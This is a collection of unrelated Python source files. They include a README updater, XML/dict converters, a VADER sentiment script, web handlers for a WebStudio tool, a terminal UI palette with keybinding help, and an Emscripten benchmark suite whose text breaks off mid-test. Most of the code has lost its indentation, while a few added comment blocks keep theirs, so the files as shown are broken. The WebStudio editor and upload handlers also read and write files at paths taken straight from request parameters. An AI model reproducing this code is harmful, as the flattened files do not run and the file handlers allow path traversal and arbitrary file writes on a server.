# update the date
def updateDate():
import time
return "# Date: " + time.strftime("%m/%d/%Y") + "\n"
# update the total number
def updateTotalNumber():
totalNumber = 0
for stuff in os.listdir("."):
potentialDir = os.path.join(os.path.abspath("."), stuff)
if os.path.isdir(potentialDir):
for filename in os.listdir(potentialDir):
if filename.endswith(".jpg"):
totalNumber += 1
return "# Photos In Total: "+ str(totalNumber) + "\n"
# change a specific line
def replaceLine(line_num, text):
lines = open("README.md", 'r').readlines()
lines[line_num] = text
out = open("README.md", 'w')
out.writelines(lines)
out.close()
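    # note: line_num is zero-based, so updateFile below rewrites lines 2-4
    # of README.md (place, total, date) and leaves the title line untouched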
# update the file
def updateFile(updatePlaceStr, updateTotalNumberStr, updateDateStr):
replaceLine(1,updatePlaceStr)
replaceLine(2,updateTotalNumberStr)
replaceLine(3,updateDateStr)
# main method
def updateREADME():
updatePlaceStr = updatePlace()
updateTotalNumberStr = updateTotalNumber()
updateDateStr = updateDate()
updateFile(updatePlaceStr, updateTotalNumberStr, updateDateStr)
if __name__ == "__main__":
updateREADME()
| WesleyyC/Lazy-Script | Jo's Flash Drive/updateREADME.py | Python | mit | 1,637 |
from django.utils.encoding import smart_unicode
from django.utils.xmlutils import SimplerXMLGenerator
from rest_framework.compat import StringIO
import re
import xml.etree.ElementTree as ET
# From xml2dict
class XML2Dict(object):
def __init__(self):
pass
def _parse_node(self, node):
        node_tree = {}
        # A node with no attributes or children collapses to its text value;
        # mixed content (text plus attributes/children) is not supported by
        # this parser, and the text is dropped in that case
        if node.text and not node.attrib and not node.getchildren():
            return node.text
        for (k, v) in node.attrib.items():
            k, v = self._namespace_split(k, v)
            node_tree[k] = v
        # Save children
for child in node.getchildren():
tag, tree = self._namespace_split(child.tag, self._parse_node(child))
if tag not in node_tree: # the first time, so store it in dict
node_tree[tag] = tree
continue
old = node_tree[tag]
if not isinstance(old, list):
node_tree.pop(tag)
node_tree[tag] = [old] # multi times, so change old dict to a list
node_tree[tag].append(tree) # add the new one
return node_tree
def _namespace_split(self, tag, value):
"""
Split the tag '{http://cs.sfsu.edu/csc867/myscheduler}patients'
ns = http://cs.sfsu.edu/csc867/myscheduler
name = patients
"""
result = re.compile("\{(.*)\}(.*)").search(tag)
if result:
value.namespace, tag = result.groups()
return (tag, value)
    def parse(self, file):
        """parse a xml file to a dict"""
        with open(file, 'r') as f:
            return self.fromstring(f.read())
def fromstring(self, s):
"""parse a string"""
t = ET.fromstring(s)
unused_root_tag, root_tree = self._namespace_split(t.tag, self._parse_node(t))
return root_tree
def xml2dict(input):
return XML2Dict().fromstring(input)
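# Illustrative usage (not part of the original module): simple elements
# collapse to their text, and repeated tags become lists, e.g.
#   xml2dict('<root><a>1</a><a>2</a><b>x</b></root>')
#   -> {'a': ['1', '2'], 'b': 'x'}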
# Piston:
class XMLRenderer():
def _to_xml(self, xml, data):
if isinstance(data, (list, tuple)):
for item in data:
xml.startElement("list-item", {})
self._to_xml(xml, item)
xml.endElement("list-item")
elif isinstance(data, dict):
for key, value in data.iteritems():
xml.startElement(key, {})
self._to_xml(xml, value)
xml.endElement(key)
elif data is None:
# Don't output any value
pass
else:
xml.characters(smart_unicode(data))
def dict2xml(self, data):
stream = StringIO.StringIO()
xml = SimplerXMLGenerator(stream, "utf-8")
xml.startDocument()
xml.startElement("root", {})
self._to_xml(xml, data)
xml.endElement("root")
xml.endDocument()
return stream.getvalue()
def dict2xml(input):
return XMLRenderer().dict2xml(input)
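# Illustrative output (exact whitespace may vary by Django version):
#   dict2xml({'a': [1, 2]})
#   -> '<?xml version="1.0" encoding="utf-8"?>\n'
#      '<root><a><list-item>1</list-item><list-item>2</list-item></a></root>'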
| voer-platform/vp.repo | vpr/rest_framework/utils/__init__.py | Python | agpl-3.0 | 2,929 |
# -*- coding: utf-8 -*-
from nltk.sentiment.vader import SentimentIntensityAnalyzer
from unidecode import unidecode
"""
This script uses the NLTK implementation of VADER to get the sentiment
polarities of all the original files with ground truth values.
Data set: http://comp.social.gatech.edu/papers/hutto_ICWSM_2014.tar.gz
Article: http://comp.social.gatech.edu/papers/icwsm14.vader.hutto.pdf
The TSV files created using this script serve as the ground truth for comparing
results of the Java port of the NLTK VADER sentiment analyzer.
"""
sid = SentimentIntensityAnalyzer()
ground_truth_file_list = [
"GroundTruth/tweets_GroundTruth.txt",
"GroundTruth/amazonReviewSnippets_GroundTruth.txt",
"GroundTruth/movieReviewSnippets_GroundTruth.txt",
"GroundTruth/nytEditorialSnippets_GroundTruth.txt"
]
def remove_non_ascii(text):
return unidecode(unicode(text, encoding="utf-8"))
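# For reference, polarity_scores() returns a dict with "neg", "neu", "pos"
# and "compound" keys; the canonical VADER example (values can differ
# slightly across NLTK versions):
#   sid.polarity_scores("VADER is smart, handsome, and funny.")
#   -> {'neg': 0.0, 'neu': 0.254, 'pos': 0.746, 'compound': 0.8316}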
for test_file in ground_truth_file_list:
current_file = test_file.split("/")[1].split(".")[0]
output_filename = current_file + "_vader.tsv"
with open(output_filename, "wb") as csv_file:
with open(test_file, "rb") as tweets:
for line in tweets.readlines():
tweet_id, _, tweet = line.split("\t")
tweet = remove_non_ascii(tweet.strip())
ss = sid.polarity_scores(tweet)
csv_file.write("\t".join([tweet_id, str(ss["neg"]), str(ss["neu"]), str(ss["pos"]), str(ss["compound"]),
tweet.strip()]) + "\n")
print "Created output for ", test_file, "as", output_filename
| nunoachenriques/vader-sentiment-analysis | src/test/resources/getNltkVader.py | Python | apache-2.0 | 1,609 |
# -*- Mode: Python; coding: utf-8; indent-tabs-mode: nil; tab-width: 4 -*-
### BEGIN LICENSE
# Copyright (C) 2014 Brian Douglass bhdouglass@gmail.com
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 3, as published
# by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranties of
# MERCHANTABILITY, SATISFACTORY QUALITY, or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
### END LICENSE
from agui.aextras.about import AAbout
from agui.aextras.icon import AIcon
from agui.aextras.message import AMessage
from agui.aextras.popup import APopup
from agui.aextras.sound import ASound
from agui.aextras.timeout import ATimeout
| bhdouglass/agui | agui/aextras/__init__.py | Python | gpl-3.0 | 997 |
from WebStudioLib import *
from WebStudioUtil import *
from WebStudioBase import *
from WebStudioApi import *
class PageMainHandler(BaseHandler):
def get(self):
self.render_template('main.html')
class PageTableHandler(BaseHandler):
def get(self):
self.render_template_Vue('table.html')
class PageTaskAnalyzerHandler(BaseHandler):
def get(self):
self.render_template_Vue('task_analyzer.html')
class PageQueueHandler(BaseHandler):
def get(self):
self.render_template_Vue('queue.html')
class PageCliHandler(BaseHandler):
def get(self):
self.render_template('cli.html')
class PageBashHandler(BaseHandler):
def get(self):
self.render_template('bash.html')
class PageEditorHandler(BaseHandler):
def get(self):
params = {}
dir = os.getcwd()
working_dir = self.request.get('working_dir')
file_name = self.request.get('file_name')
if file_name != '':
read_file = open(os.path.join(dir,working_dir, file_name),'r')
content = read_file.read()
read_file.close()
else:
content = ''
dir_list = []
lastPath = ''
for d in working_dir.split('/'):
if lastPath!='':
lastPath += '/'
lastPath +=d
dir_list.append({'path':lastPath,'name':d})
params['FILES'] = [f for f in os.listdir(os.path.join(dir,working_dir)) if os.path.isfile(os.path.join(dir,working_dir,f))]
params['FILEFOLDERS'] = [f for f in os.listdir(os.path.join(dir,working_dir)) if os.path.isdir(os.path.join(dir,working_dir,f))]
params['WORKING_DIR'] = working_dir
params['DIR_LIST'] = dir_list
params['CONTENT'] = content
params['FILE_NAME'] = file_name
self.render_template('editor.html',params)
def post(self):
content = self.request.get('content')
dir = os.path.dirname(__file__)
working_dir = self.request.get('working_dir')
file_name = self.request.get('file_name')
if file_name != '':
write_file = open(os.path.join(dir,working_dir, file_name),'w')
write_file.write(content)
write_file.close()
self.response.write("Successfully saved!")
else:
self.response.write("No file opened!")
class PageConfigureHandler(BaseHandler):
def get(self):
self.render_template_Vue('configure.html')
class PageFileViewHandler(BaseHandler):
def get(self):
params = {}
working_dir = self.request.get('working_dir')
root_dir = self.request.get('root_dir')
        if root_dir == 'local':
            dir = os.path.dirname(GetWebStudioDirPath()+'/local/')
        elif root_dir == 'app':
            dir = os.path.dirname(os.getcwd()+"/")
        elif root_dir == '':
            root_dir = 'app'
            dir = os.path.dirname(os.getcwd()+"/")
        else:
            self.response.write('Unknown root_dir, expected "app" or "local"')
            return
try:
params['FILES'] = [f for f in os.listdir(os.path.join(dir,working_dir)) if os.path.isfile(os.path.join(dir,working_dir,f))]
params['FILEFOLDERS'] = [f for f in os.listdir(os.path.join(dir,working_dir)) if os.path.isdir(os.path.join(dir,working_dir,f))]
except:
self.response.write('Cannot find the specified file path, please check again')
return
dir_list = []
lastPath = ''
for d in working_dir.split('/'):
if lastPath!='':
lastPath += '/'
lastPath +=d
dir_list.append({'path':lastPath,'name':d})
params['WORKING_DIR'] = working_dir
params['ROOT_DIR'] = root_dir
params['DIR_LIST'] = dir_list
self.render_template('fileview.html',params)
def post(self):
params = {}
dir = os.path.dirname(os.getcwd()+"/")
working_dir = self.request.get('working_dir')
try:
raw_file = self.request.get('fileToUpload')
file_name = self.request.get('file_name')
savedFile = open(os.path.join(dir,working_dir,file_name),'wb')
savedFile.write(raw_file)
savedFile.close()
params['RESPONSE'] = 'success'
except:
params['RESPONSE'] = 'fail'
dir_list = []
lastPath = ''
for d in working_dir.split('/'):
if lastPath!='':
lastPath += '/'
lastPath +=d
dir_list.append({'path':lastPath,'name':d})
params['FILES'] = [f for f in os.listdir(os.path.join(dir,working_dir)) if os.path.isfile(os.path.join(dir,working_dir,f))]
params['FILEFOLDERS'] = [f for f in os.listdir(os.path.join(dir,working_dir)) if os.path.isdir(os.path.join(dir,working_dir,f))]
params['WORKING_DIR'] = working_dir
params['DIR_LIST'] = dir_list
self.render_template('fileview.html',params)
class PageAnalyzerHandler(BaseHandler):
def get(self):
self.render_template_Vue('analyzer.html')
class PageCounterViewHandler(BaseHandler):
def get(self):
self.render_template_Vue('counterview.html')
class PageStoreHandler(BaseHandler):
def get(self):
self.render_template_Vue('store.html')
def post(self):
raw_file = self.request.get('fileToUpload')
file_path = self.request.get('file_path')
raw_icon = self.request.get('iconToUpload')
icon_path = self.request.get('icon_path');
pack_name = self.request.get('file_name');
author = self.request.get('author')
description = self.request.get('description')
schema_info = self.request.get('schema_info')
schema_type = self.request.get('schema_type')
rpc_type = self.request.get('rpc_type')
parameters = self.request.get('parameters')
if_stateful = self.request.get('if_stateful')
#
pack_dir = os.path.join(GetWebStudioDirPath(),'local','packages', pack_name);
if not os.path.exists(pack_dir):
os.makedirs(pack_dir)
# save uploaded package
savedFile = open(os.path.join(GetWebStudioDirPath(),'local','packages', file_path), 'wb')
savedFile.write(raw_file)
savedFile.close()
# save icon file
iconFile = open(os.path.join(pack_dir, icon_path), 'wb')
iconFile.write(raw_icon)
iconFile.close()
# save to db
conn = sqlite3.connect(os.path.join(GetWebStudioDirPath(),'local','data.db'))
c = conn.cursor()
c.execute(TCreate.render({'dataType':'app_package','elems': sqlDataType['app_package']['elems']}))
c.execute(TInsert.render({'dataType':'app_package','val_list':[
pack_name,
author,
description,
schema_info,
schema_type,
rpc_type,
parameters,
if_stateful,
file_path,
icon_path
]}))
conn.commit()
return webapp2.redirect('/store.html')
class PageMulticmdHandler(BaseHandler):
def get(self):
self.render_template_Vue('multicmd.html')
class PageServiceMetaHandler(BaseHandler):
def get(self):
self.render_template_Vue('service_meta.html')
class PageMachineHandler(BaseHandler):
def get(self):
self.render_template_Vue('machine.html')
class PageSettingHandler(BaseHandler):
def get(self):
self.render_template_Vue('setting.html')
| Microsoft/rDSN | src/tools/webstudio/app_package/WebStudioPage.py | Python | mit | 7,573 |
MAIN_LIST_FOCUS = "main_list_focus"
STATUS_BG = "#06a"
STATUS_BG_FOCUS = "#08d"
# name, fg, bg, mono, fg_h, bg_h
PALLETE = [
(MAIN_LIST_FOCUS, 'default', 'brown', "default", "white", "#060"), # a60
('main_list_lg', 'light gray', 'default', "default", "g100", "default"),
('main_list_dg', 'dark gray', 'default', "default", "g78", "default"),
('main_list_ddg', 'dark gray', 'default', "default", "g56", "default"),
('main_list_white', 'white', 'default', "default", "white", "default"),
('main_list_green', 'dark green', 'default', "default", "#0f0", "default"),
('main_list_yellow', 'brown', 'default', "default", "#ff0", "default"),
('main_list_orange', 'light red', 'default', "default", "#fa0", "default"),
('main_list_red', 'dark red', 'default', "default", "#f00", "default"),
('image_names', 'light magenta', 'default', "default", "#F0F", "default"),
('status_box', 'default', 'black', "default", "g100", STATUS_BG),
('status_box_focus', 'default', 'black', "default", "white", STATUS_BG_FOCUS),
('status', 'default', 'default', "default", "default", STATUS_BG),
('status_text', 'default', 'default', "default", "g100", STATUS_BG),
('status_text_green', 'default', 'default', "default", "#0f0", STATUS_BG),
('status_text_yellow', 'default', 'default', "default", "#ff0", STATUS_BG),
('status_text_orange', 'default', 'default', "default", "#f80", STATUS_BG),
('status_text_red', 'default', 'default', "default", "#f66", STATUS_BG),
('notif_error', "white", 'dark red', "default", "white", "#f00",),
('notif_info', 'white', 'default', "default", "g100", "default"),
('notif_important', 'white', 'default', "default", "white", "default"),
('notif_text_green', 'white', 'default', "white", "#0f0", "default"),
('notif_text_yellow', 'white', 'default', "white", "#ff0", "default"),
('notif_text_orange', 'white', 'default', "white", "#f80", "default"),
('notif_text_red', 'white', 'default', "white", "#f66", "default"),
('tree', 'dark green', 'default', "default", "dark green", "default"),
('graph_bg', "default", 'default', "default", "default", "default"),
('graph_lines_cpu', "default", 'default', "default", "default", "#d63"),
('graph_lines_cpu_tips', "default", 'default', "default", "#d63", "default"),
('graph_lines_cpu_legend', "default", 'default', "default", "#f96", "default"),
('graph_lines_mem', "default", 'default', "default", "default", "#39f"),
('graph_lines_mem_tips', "default", 'default', "default", "#39f", "default"),
('graph_lines_mem_legend', "default", 'default', "default", "#6af", "default"),
('graph_lines_blkio_r', "default", 'default', "default", "default", "#9b0"),
('graph_lines_blkio_r_tips', "default", 'default', "default", "#9b0", "default"),
('graph_lines_blkio_r_legend', "default", 'default', "default", "#cf0", "default"),
('graph_lines_blkio_w', "default", 'default', "default", "default", "#b90"),
('graph_lines_blkio_w_tips', "default", 'default', "default", "#b90", "default"),
('graph_lines_blkio_w_legend', "default", 'default', "default", "#fc0", "default"),
('graph_lines_net_r', "default", 'default', "default", "default", "#3ca"),
('graph_lines_net_r_tips', "default", 'default', "default", "#3ca", "default"),
('graph_lines_net_r_legend', "default", 'default', "default", "#6fc", "default"),
('graph_lines_net_w', "default", 'default', "default", "default", "#3ac"),
('graph_lines_net_w_tips', "default", 'default', "default", "#3ac", "default"),
('graph_lines_net_w_legend', "default", 'default', "default", "#6cf", "default"),
]
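# The 6-tuples above follow urwid's palette entry format
# (name, foreground, background, mono, foreground_high, background_high).
# Minimal, hypothetical wiring (the widget name is an assumption):
#   import urwid
#   loop = urwid.MainLoop(root_widget, palette=PALLETE)
#   loop.screen.set_terminal_properties(colors=256)  # enables the *_h colors
#   loop.run()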
STATUS_BAR_REFRESH_SECONDS = 5
CLEAR_NOTIF_BAR_MESSAGE_IN = 5
# FIXME: generate dynamically now
HELP_TEXT = """\
# Keybindings
Since I am a heavy `vim` user, these keybindings are trying to stay close to vim.
## Global
/ search (provide empty query to disable searching)
n next search occurrence
N previous search occurrence
f4 display only lines matching provided query (provide empty query to clear filtering)
* main listing provides additional filtering (for more info, check Listing Section)
* example query: "fed" - display lines containing string "fed"
f5 open a tree view of all images (`docker images --tree` equivalent)
ctrl o next buffer
ctrl i previous buffer
x remove buffer
ctrl l redraw user interface
h, ? show help
## Movement
gg go to first item
G go to last item
j go one line down
k go one line up
pg up
ctrl u go 10 lines up
pg down
ctrl d go 10 lines down
## Listing
@ refresh listing
f4 display only lines matching provided query (provide empty query to clear filtering)
* space-separated list of query strings, currently supported filters are:
* t[ype]=c[ontainer[s]]
* t[ype]=i[mage[s]]
* s[tate]=r[unning])
example query may be:
* "type=container" - show only containers (short equivalent is "t=c")
* "type=image fedora" - show images with string "fedora" in name (equivalent "t=i fedora")
## Image commands in listing
i inspect image
d remove image (irreversible!)
enter display detailed info about image (when layer is focused)
## Container commands in listing
i inspect container
l display logs of container
f follow logs of container
d remove container (irreversible!)
t stop container
s start container
r restart container
p pause container
u unpause container
X kill container
! toggle realtime updates of the interface (useful when you are removing multiple
objects and don't want the listing to shift mid-operation, causing you to remove the wrong one)
## Tree buffer
enter display detailed info about image (opens image info buffer)
## Image info buffer
d remove image tag (when image name is focused)
enter display detailed info about image (when layer is focused)
i inspect image (when layer is focused)
"""
| f-cap/sen | sen/tui/constants.py | Python | mit | 6,074 |
import math, os, shutil, subprocess
import runner
from runner import RunnerCore, path_from_root
from tools.shared import *
# standard arguments for timing:
# 0: no runtime, just startup
# 1: very little runtime
# 2: 0.5 seconds
# 3: 1 second
# 4: 5 seconds
# 5: 10 seconds
DEFAULT_ARG = '4'
TEST_REPS = 2
CORE_BENCHMARKS = True # core benchmarks vs full regression suite
class Benchmarker:
def __init__(self, name):
self.name = name
def bench(self, args, output_parser=None, reps=TEST_REPS):
self.times = []
self.reps = reps
for i in range(reps):
start = time.time()
output = self.run(args)
if not output_parser:
curr = time.time()-start
else:
curr = output_parser(output)
self.times.append(curr)
def display(self, baseline=None):
if baseline == self: baseline = None
mean = sum(self.times)/len(self.times)
squared_times = map(lambda x: x*x, self.times)
mean_of_squared = sum(squared_times)/len(self.times)
std = math.sqrt(mean_of_squared - mean*mean)
sorted_times = self.times[:]
sorted_times.sort()
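    # note: the median below averages the two middle samples, which is exact
    # for the even-length runs used here (TEST_REPS is even); for odd lengths
    # it averages the lower-middle pair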
median = sum(sorted_times[len(sorted_times)/2 - 1:len(sorted_times)/2 + 1])/2
print ' %10s: mean: %4.3f (+-%4.3f) secs median: %4.3f range: %4.3f-%4.3f (noise: %4.3f%%) (%d runs)' % (self.name, mean, std, median, min(self.times), max(self.times), 100*std/mean, self.reps),
if baseline:
mean_baseline = sum(baseline.times)/len(baseline.times)
final = mean / mean_baseline
print ' Relative: %.2f X slower' % final
else:
print
class NativeBenchmarker(Benchmarker):
def __init__(self, name, cc, cxx, args=['-O2']):
self.name = name
self.cc = cc
self.cxx = cxx
self.args = args
def build(self, parent, filename, args, shared_args, emcc_args, native_args, native_exec, lib_builder):
self.parent = parent
if lib_builder: native_args = native_args + lib_builder(self.name, native=True, env_init={ 'CC': self.cc, 'CXX': self.cxx })
if not native_exec:
compiler = self.cxx if filename.endswith('cpp') else self.cc
process = Popen([compiler, '-fno-math-errno', filename, '-o', filename+'.native'] + self.args + shared_args + native_args, stdout=PIPE, stderr=parent.stderr_redirect)
output = process.communicate()
      if process.returncode != 0:
print >> sys.stderr, "Building native executable with command failed"
print "Output: " + output[0]
else:
shutil.copyfile(native_exec, filename + '.native')
shutil.copymode(native_exec, filename + '.native')
final = os.path.dirname(filename) + os.path.sep + self.name+'_' + os.path.basename(filename) + '.native'
shutil.move(filename + '.native', final)
self.filename = final
def run(self, args):
process = Popen([self.filename] + args, stdout=PIPE, stderr=PIPE)
return process.communicate()[0]
class JSBenchmarker(Benchmarker):
def __init__(self, name, engine, extra_args=[], env={}):
self.name = name
self.engine = engine
self.extra_args = extra_args
self.env = os.environ.copy()
for k, v in env.iteritems():
self.env[k] = v
def build(self, parent, filename, args, shared_args, emcc_args, native_args, native_exec, lib_builder):
self.filename = filename
llvm_root = self.env.get('LLVM') or LLVM_ROOT
if lib_builder: emcc_args = emcc_args + lib_builder('js_' + llvm_root, native=False, env_init=self.env)
open('hardcode.py', 'w').write('''
def process(filename):
js = open(filename).read()
replaced = js.replace("run();", "run(%s.concat(Module[\\"arguments\\"]));")
assert js != replaced
open(filename, 'w').write(replaced)
import sys
process(sys.argv[1])
''' % str(args[:-1]) # do not hardcode in the last argument, the default arg
)
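    # hardcode.py bakes all but the last benchmark argument into the JS entry
    # point (the run(...) call), so only the size-selecting argument is passed
    # at run time via Module["arguments"]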
final = os.path.dirname(filename) + os.path.sep + self.name+'_' + os.path.basename(filename) + '.js'
try_delete(final)
output = Popen([PYTHON, EMCC, filename, #'-O3',
'-O3', '-s', 'DOUBLE_MODE=0', '-s', 'PRECISE_I64_MATH=0',
'--memory-init-file', '0', '--js-transform', 'python hardcode.py',
'-s', 'TOTAL_MEMORY=128*1024*1024',
#'--profiling',
#'--closure', '1',
'-o', final] + shared_args + emcc_args + self.extra_args, stdout=PIPE, stderr=PIPE, env=self.env).communicate()
assert os.path.exists(final), 'Failed to compile file: ' + output[0]
self.filename = final
def run(self, args):
return run_js(self.filename, engine=self.engine, args=args, stderr=PIPE, full_output=True, assert_returncode=None)
# Benchmarkers
try:
default_native = LLVM_3_2
default_native_name = 'clang-3.2'
except:
if 'benchmark' in str(sys.argv):
print 'LLVM_3_2 not defined, using our LLVM instead (%s)' % LLVM_ROOT
default_native = LLVM_ROOT
default_native_name = 'clang'
try:
benchmarkers_error = ''
benchmarkers = [
#NativeBenchmarker('clang', CLANG_CC, CLANG),
NativeBenchmarker(default_native_name, os.path.join(default_native, 'clang'), os.path.join(default_native, 'clang++')),
#NativeBenchmarker('clang-3.2-O3', os.path.join(default_native, 'clang'), os.path.join(default_native, 'clang++'), ['-O3']),
#NativeBenchmarker('clang-3.3', os.path.join(LLVM_3_3, 'clang'), os.path.join(LLVM_3_3, 'clang++')),
#NativeBenchmarker('clang-3.4', os.path.join(LLVM_3_4, 'clang'), os.path.join(LLVM_3_4, 'clang++')),
#NativeBenchmarker('gcc', 'gcc', 'g++'),
JSBenchmarker('sm-f32', SPIDERMONKEY_ENGINE, ['-s', 'PRECISE_F32=2']),
#JSBenchmarker('sm-f32-si', SPIDERMONKEY_ENGINE, ['--profiling', '-s', 'PRECISE_F32=2', '-s', 'SIMPLIFY_IFS=1']),
#JSBenchmarker('sm-f32-aggro', SPIDERMONKEY_ENGINE, ['-s', 'PRECISE_F32=2', '-s', 'AGGRESSIVE_VARIABLE_ELIMINATION=1']),
#JSBenchmarker('sm-f32-3.2', SPIDERMONKEY_ENGINE, ['-s', 'PRECISE_F32=2'], env={ 'LLVM': LLVM_3_2 }),
#JSBenchmarker('sm-f32-3.3', SPIDERMONKEY_ENGINE, ['-s', 'PRECISE_F32=2'], env={ 'LLVM': LLVM_3_3 }),
#JSBenchmarker('sm-f32-3.4', SPIDERMONKEY_ENGINE, ['-s', 'PRECISE_F32=2'], env={ 'LLVM': LLVM_3_4 }),
#JSBenchmarker('sm-noasm', SPIDERMONKEY_ENGINE + ['--no-asmjs']),
#JSBenchmarker('sm-noasm-f32', SPIDERMONKEY_ENGINE + ['--no-asmjs'], ['-s', 'PRECISE_F32=2']),
#JSBenchmarker('v8', V8_ENGINE),
#JSBenchmarker('sm-emterp', SPIDERMONKEY_ENGINE, ['-s', 'EMTERPRETIFY=1', '--memory-init-file', '1']),
]
except Exception, e:
benchmarkers_error = str(e)
benchmarkers = []
class benchmark(RunnerCore):
save_dir = True
@classmethod
def setUpClass(self):
super(benchmark, self).setUpClass()
fingerprint = [time.asctime()]
try:
fingerprint.append('em: ' + Popen(['git', 'show'], stdout=PIPE).communicate()[0].split('\n')[0])
except:
pass
try:
d = os.getcwd()
os.chdir(os.path.expanduser('~/Dev/mozilla-central'))
fingerprint.append('sm: ' + filter(lambda line: 'changeset' in line,
Popen(['hg', 'tip'], stdout=PIPE).communicate()[0].split('\n'))[0])
except:
pass
finally:
os.chdir(d)
fingerprint.append('llvm: ' + LLVM_ROOT)
print 'Running Emscripten benchmarks... [ %s ]' % ' | '.join(fingerprint)
assert(os.path.exists(CLOSURE_COMPILER))
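    # note: the assignment in the try block below makes SPIDERMONKEY_ENGINE
    # local to this function, so the preceding .index() read raises
    # UnboundLocalError and the bare except silently skips the strict-mode
    # stripping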
try:
index = SPIDERMONKEY_ENGINE.index("options('strict')")
SPIDERMONKEY_ENGINE = SPIDERMONKEY_ENGINE[:index-1] + SPIDERMONKEY_ENGINE[index+1:] # closure generates non-strict
except:
pass
Building.COMPILER = CLANG
Building.COMPILER_TEST_OPTS = ['-O2']
def do_benchmark(self, name, src, expected_output='FAIL', args=[], emcc_args=[], native_args=[], shared_args=[], force_c=False, reps=TEST_REPS, native_exec=None, output_parser=None, args_processor=None, lib_builder=None):
if len(benchmarkers) == 0: raise Exception('error, no benchmarkers: ' + benchmarkers_error)
args = args or [DEFAULT_ARG]
if args_processor: args = args_processor(args)
dirname = self.get_dir()
filename = os.path.join(dirname, name + '.c' + ('' if force_c else 'pp'))
f = open(filename, 'w')
f.write(src)
f.close()
print
for b in benchmarkers:
b.build(self, filename, args, shared_args, emcc_args, native_args, native_exec, lib_builder)
b.bench(args, output_parser, reps)
b.display(benchmarkers[0])
def test_primes(self):
src = r'''
#include<stdio.h>
#include<math.h>
int main(int argc, char **argv) {
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: arg = 33000; break;
case 2: arg = 130000; break;
case 3: arg = 220000; break;
case 4: arg = 610000; break;
case 5: arg = 1010000; break;
default: printf("error: %d\\n", arg); return -1;
}
int primes = 0, curri = 2;
while (primes < arg) {
int ok = true;
for (int j = 2; j < sqrtf(curri); j++) {
if (curri % j == 0) {
ok = false;
break;
}
}
if (ok) {
primes++;
}
curri++;
}
printf("lastprime: %d.\n", curri-1);
return 0;
}
'''
self.do_benchmark('primes', src, 'lastprime:')
def test_memops(self):
src = '''
#include<stdio.h>
#include<string.h>
#include<stdlib.h>
int main(int argc, char **argv) {
int N, M;
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: N = 1024*1024; M = 55; break;
case 2: N = 1024*1024; M = 400; break;
case 3: N = 1024*1024; M = 800; break;
case 4: N = 1024*1024; M = 4000; break;
case 5: N = 1024*1024; M = 8000; break;
default: printf("error: %d\\n", arg); return -1;
}
int final = 0;
char *buf = (char*)malloc(N);
for (int t = 0; t < M; t++) {
for (int i = 0; i < N; i++)
buf[i] = (i + final)%256;
for (int i = 0; i < N; i++)
final += buf[i] & 1;
final = final % 1000;
}
printf("final: %d.\\n", final);
return 0;
}
'''
self.do_benchmark('memops', src, 'final:')
def zzztest_files(self):
src = r'''
#include<stdio.h>
#include<stdlib.h>
#include<assert.h>
#include <unistd.h>
int main() {
int N = 100;
int M = 1000;
int K = 1000;
unsigned char *k = (unsigned char*)malloc(K+1), *k2 = (unsigned char*)malloc(K+1);
for (int i = 0; i < K; i++) {
k[i] = (i % 250) + 1;
}
k[K] = 0;
char buf[100];
for (int i = 0; i < N; i++) {
sprintf(buf, "/dev/shm/file-%d.dat", i);
FILE *f = fopen(buf, "w");
for (int j = 0; j < M; j++) {
fwrite(k, 1, (j % K) + 1, f);
}
fclose(f);
}
for (int i = 0; i < N; i++) {
sprintf(buf, "/dev/shm/file-%d.dat", i);
FILE *f = fopen(buf, "r");
for (int j = 0; j < M; j++) {
fread(k2, 1, (j % K) + 1, f);
}
fclose(f);
for (int j = 0; j < K; j++) {
assert(k[j] == k2[j]);
}
unlink(buf);
}
printf("ok");
return 0;
}
'''
self.do_benchmark(src, 'ok')
def test_copy(self):
src = r'''
#include<stdio.h>
struct vec {
int x, y, z;
int r, g, b;
vec(int x_, int y_, int z_, int r_, int g_, int b_) : x(x_), y(y_), z(z_), r(r_), g(g_), b(b_) {}
static vec add(vec a, vec b) {
return vec(a.x+b.x, a.y+b.y, a.z+b.z, a.r+b.r, a.g+b.g, a.b+b.b);
}
void norm() {
x %= 1024;
y %= 1024;
z %= 1024;
r %= 1024;
b %= 1024;
g %= 1024;
}
int sum() { return x + y + z + r + g + b; }
};
int main(int argc, char **argv) {
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: arg = 75; break;
case 2: arg = 625; break;
case 3: arg = 1250; break;
case 4: arg = 5*1250; break;
case 5: arg = 10*1250; break;
default: printf("error: %d\\n", arg); return -1;
}
int total = 0;
for (int i = 0; i < arg; i++) {
for (int j = 0; j < 50000; j++) {
vec c(i, i+i%10, j*2, i%255, j%120, i%15);
vec d(j+i%10, j*2, j%255, i%120, j%15, j);
vec e = c;
c.norm();
d.norm();
vec f = vec::add(c, d);
f = vec::add(e, f);
f.norm();
f = vec::add(d, f);
total += f.sum() % 100;
total %= 10240;
}
}
printf("sum:%d\n", total);
return 0;
}
'''
self.do_benchmark('copy', src, 'sum:')
def test_ifs(self):
src = r'''
#include <stdio.h>
#include <stdlib.h>
volatile int x = 0;
__attribute__ ((noinline)) int calc() {
return (x++) & 16384;
}
int main(int argc, char *argv[]) {
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: arg = 75; break;
case 2: arg = 625; break;
case 3: arg = 1250; break;
case 4: arg = 5*1250; break;
case 5: arg = 10*1250; break;
default: printf("error: %d\\n", arg); return -1;
}
int sum = 0;
for (int j = 0; j < 27000; j++) {
for (int i = 0; i < arg; i++) {
if (calc() && calc()) {
sum += 17;
} else {
sum += 19;
}
if (calc() || calc()) {
sum += 23;
}
}
}
printf("ok\n");
return sum;
}
'''
self.do_benchmark('ifs', src, 'ok', reps=TEST_REPS*5)
def test_conditionals(self):
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
int arg = argc > 1 ? argv[1][0] - '0' : 3;
switch(arg) {
case 0: return 0; break;
case 1: arg = 3*75; break;
case 2: arg = 3*625; break;
case 3: arg = 3*1250; break;
case 4: arg = 3*5*1250; break;
case 5: arg = 3*10*1250; break;
